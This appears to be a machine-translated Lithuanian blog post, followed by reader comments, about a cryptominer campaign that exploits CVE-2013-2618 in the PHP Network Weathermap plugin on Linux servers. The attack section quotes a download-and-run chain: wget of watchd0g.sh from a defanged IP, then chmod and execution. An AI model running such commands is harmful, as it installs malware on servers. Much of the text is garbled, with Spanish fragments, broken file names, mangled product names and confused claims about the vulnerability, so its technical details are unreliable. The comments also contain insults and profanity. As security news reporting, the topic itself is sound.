Tai iš kriptovaliutos kasėjas naudojant nuotolinius kompiuterius be leidimo jų savininkų tampa tendencija. Aš jau keletą kartų apie tai kalbėjau čia, tinklaraštyje, apie tokio tipo situaciją.
Tai yra tai, kad tai jau visiškai nekontroliuojama nuo to momento, kai kriptovaliutos užėmė gana didelę vietą ir vertę, žmonės, turintys pakankamai žinių, kad galėtų naudotis kompiuteriais, kurie pažeidžia jų saugumą, atidėjo laiko gaišimą ieškodami svarbios informacijos ar banko sąskaitų, kad gautų piniginę naudą.
Užuot tai darę, jie pasirenka paprasčiausią dalyką - perima šių komandų kontrolę ir sujungia jas į kasybos tinklą, taip pat atlieka kitas užduotis, kurias jos paprastai atlieka su robotu.
Tokiu būdu paprastai labiau jus numeruoti, jie sutelkia dėmesį tik į momentinius pinigus, kuriuos jie sugeneruoja.
Protingai suprantant rinkos tendencijas ir tinkamai žinant apie kriptografinę prekybą, galima gauti didelę naudą.
Ar „Linux“ tikrai yra saugi sistema?
Daugelis iš mūsų galvoja, kad „Linux“ yra beveik tobula saugi operacinė sistema, realybė yra ta, kad ji vis dar turi tam tikrų trūkumų.
Na turikeletą dienų „TrendMicro“ rado, kuriame atskleista nauja „Linux“ sistemų trūkumas, kuris įsilaužėliams suteikė kriptovaliutų kasimo pranašumą naudojant „Linux“ serverius ir mašinas.
Pareiškime per savo tinklaraštį jie pakomentavo šiuos dalykus:
Stebėdami su reagavimu į incidentus, mes stebėjome įsilaužimo bandymus, kurių rodiklius sugebėjome koreliuoti su ankstesne kriptovaliutų kasybos kampanija, kurioje buvo naudojama kenkėjiška programa „JenkinsMiner“.
Skirtumas: ši kampanija skirta „Linux“ serveriams. Tai taip pat yra klasikinis pakartotinai panaudotų pažeidžiamumų atvejis, nes jis išnaudoja pasenusį saugumo trūkumą, kurio pataisą galima įsigyti beveik penkerius metus.
Šiame leidinyje per savo analizę pavyko nustatyti paveiktas vietas už šią nesėkmę tai Tai daugiausia veikia Japoniją, Taivaną, Kiniją, JAV ir Indiją.
Atakos analizė
Analizės būdu sukūrė „Trend Micro Smart Protection Network“ šiek tiek informacijos apie tai, kaip užpuolikai naudojasi šiuo trūkumu:
Šios kampanijos operatoriai pasinaudojo CVE-2013-2618 - datos „Camapi Network Weathermap“ įskiepio pažeidžiamumu, kurį sistemos administratoriai naudoja tinklo veiklai vizualizuoti.
Kalbant apie tai, kodėl jie naudojasi senu saugumo trūkumu: „Network Weathermap“ kol kas yra tik du viešai pranešami pažeidžiamumai, abu - nuo 2014 m. Birželio mėn.
Šie užpuolikai gali pasinaudoti ne tik saugos trūkumu, kurį galima išnaudoti, bet ir pataisos vėlavimu, atsirandančiu organizacijose, naudojančiose atvirojo kodo įrankį.
Iš esmės ataka vykdoma per XSS ataką:
Apytikslė dalis yra atakos tikslas, žiniatinklio serveris su prievadu.
Failas /plugins/weathermap/configs/conn.php yra failas, atsirandantis dėl nuolatinės XSS atakos / plugins / orų žemėlapis / php .
además de jung. php Iš pradžių matome panašią HTTP užklausą, taikomą puslapiui „ atvėsina.php ".
Kriptovaliutų kasimo programa platinama per pažeidžiamumą iš PHP orų žemėlapio taikiniams, kurie yra „Linux“ serveriai
Vaizde galite pamatyti, kaip generuojama ataka, ir ji apibūdinama taip:
wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh
Tai reiškia, kad jis siunčia nurodymą atsisiųsti failą su „wget“, tai yra programa, kurią beveik visi „Linux“ paskirstymai įdiegė pagal numatytuosius nustatymus.
chmod 775 watchd0g.sh
daro failą vykdomąjį
./watchd0g.sh
Tai, ką ji daro, yra tai, kad failas būtų paleistas serveryje.
Laimei, jau yra pleistras ( CVE-2013-2618 ) yra gedimo atveju Galite atsisiųsti nuo šią nuorodą.
Si norite apie tai daugiau sužinoti apie šią nesėkmę galite apsilankyti šioje nuorodoje.
Fuente: Kriptovaliutos kasykla platinama per PHP „Weathermap“ pažeidžiamumą, nukreipiama į „Linux“ serverius
Būti idiotu nėra saugu ir, nepaisant to, „Linux“ jus taupo.
„Linux“ kaltė nėra atnaujinti saugos pataisas. Tai kalta, kad kai kurios įmonės, norėdamos sutaupyti, samdo idiotus kaip sistemos administratorius,
Tačiau net ir tokiu atveju tai NUSTATOMA IŠ karto ir išspręsta net paskelbus bet kokį nedidelį saugumo incidentą.
O kokia „Linux“ kaltė, kad jos atnaujinimai netaikomi? GNU / Linux kūrėjai atlieka savo darbą kurdami kylančių pažeidžiamumų sprendimus ir suteikdami jiems galimybę naudotis vartotojais. Jei gydytojas skiria gripo vakciną ir jūs jos negaunate, sergate ir sustingstate ... ar tai yra gydytojo kaltė?
DesdeLinux Tai ne tai, kas buvo, dvi naujienos iš eilės su dviem svarbiomis klaidomis:
1.- Į geresnius redaktorius, kad galėtų kurti, jie įdeda tą, kuri nėra nemokama programinė įranga, ir pamiršta kitus, kurie yra (jie cituojami komentaruose).
2.- Nepaprastos naujienos apie virusus, kai jie veikia tik NEATnaujintus serverius. Bet jei kuri nors „Linux“ buvo atnaujinta pagal nutylėjimą dešimtmečius. Norėdami sukelti baimę, tarsi būtų reikalinga „Windows“ stiliaus čiulpianti antivirusinė programa. Atrodo, kad jie bando pasakyti, kad „Linux“ yra tas pats, kas „Windows“, o ne.
Jei klaida sena ir jau užtaisyta, tai nėra nei naujiena, nei nieko. Negalima žaisti „Microsoft“ ir antivirusinių kompanijų, tokių kaip „Trend Micro“, „Norton“, „Panda“ ar „McAffee“, ir negauti atlyginimo.
Beje, kompanijoje keletą metų naudojome „Trend Micro“ ir tai buvo tikra bulvė, šūdas, nes jos sistemoje sakoma, kad vykdomoji programa turi virusų „pėdsakų“ (kažkas, kas gali būti virusas, net jei jo nebuvo) ir kodėl jis jį pašalino (perkėlė į katalogą, kad jis nebūtų paleistas), neleisdamas jo naudoti, ir neturėjo jokio baltojo sąrašo, kuris galėtų atblokuoti šį elgesį saugiu vykdomuoju failu, kurį mums reikėjo naudoti. Eik šūdas. Tai buvo korporacinė versija, individuali versija turėjo šią baltojo sąrašo galimybę. Patetiškas.
Neapibūdink savęs taip elegantiškai.
Straipsnyje kalbama apie saugumo spragą, leidžiančią įvesti programą, padaryti ją vykdomą ir paleisti, tai yra saugumo skylė, kurią reikia išplisti kiekvienam virusui, akivaizdu, kad tai yra virusas, kurio jam reikėtų, kad įvestos programos kodas galimybė nuskaityti kompiuterius tinkle, kad būtų galima pakartoti operaciją ir kopijuoti savarankiškai. Jie to nedaro, nes sistemoje „Linux“ atrastas saugumo spragas dengia saugos lopas, ir tai aš turiu omenyje skirtumu tarp „Windows“ ir „Linux“, nes antivirusinė programa nėra būtina, bet norint užpildyti skylę. Sistemoje „Windows“ yra sunkiau dėl kelių priežasčių: 1.- Failai gali būti vykdomi paprasčiausiai dėl jų išplėtimo, pašalinant žingsnį jų įvedimui paveiktame kompiuteryje. 2.- Vartotojai nuolat diegia abejotinos kilmės programas, nes jos yra nuosavybės teise ir turi jas turėti nemokėdami (aš nieko nesakau, ką namų ūkiui būtų pirkti „MS Office“, „Photoshop“ ... daugiau nei dvigubai kompiuterinės įrangos kaina). 3.- Anksčiau ar vėliau „Windows“ praplauks. Vartotojas nuneša jį pas kaimyną, draugą ... įdeda šnipų programą. Gali būti, kad taip nėra ir puiku, bet gali būti, kad taip yra, o jūsų „Windows“ šnipinėja jūsų slaptažodžius. Straipsnyje jie mini įvedimo sistemą „Linux“ sistemoje, kurią paveikė pažeidžiamumas, todėl programa, kuri automatiškai nuskaito tinklą ir naudoja ją kopijuoti bei paleisti serveryje, yra lengviausia visko dalis, dėl to ir buvo pasakyta straipsnis yra svarbiausias bet kokio viruso žingsnis: žinant sistemos pažeidžiamumą pulti.
Bloga informacija. Tai nėra „Linux“ klaida, tai yra PHP APPLICATION klaida, tai yra daugiaplatformė. Tai nėra išskirtinė net sistemoms, naudojančioms „Linux“ branduolį! Bet net jei programa nebūtų tarp platformų, tai nebūtų „Linux“ klaida, tai būtų tik programa.
„Linux“ branduolys neturi nė menkiausio įsikišimo apsaugant nuo tokių svetainių scenarijaus išpuolių, kaip šis. Bent ištirkite PENKAS MINUTES prieš paskelbdami, nes tiesa, kad visiems, kurie ką nors šiek tiek žino, atrodysite blogai.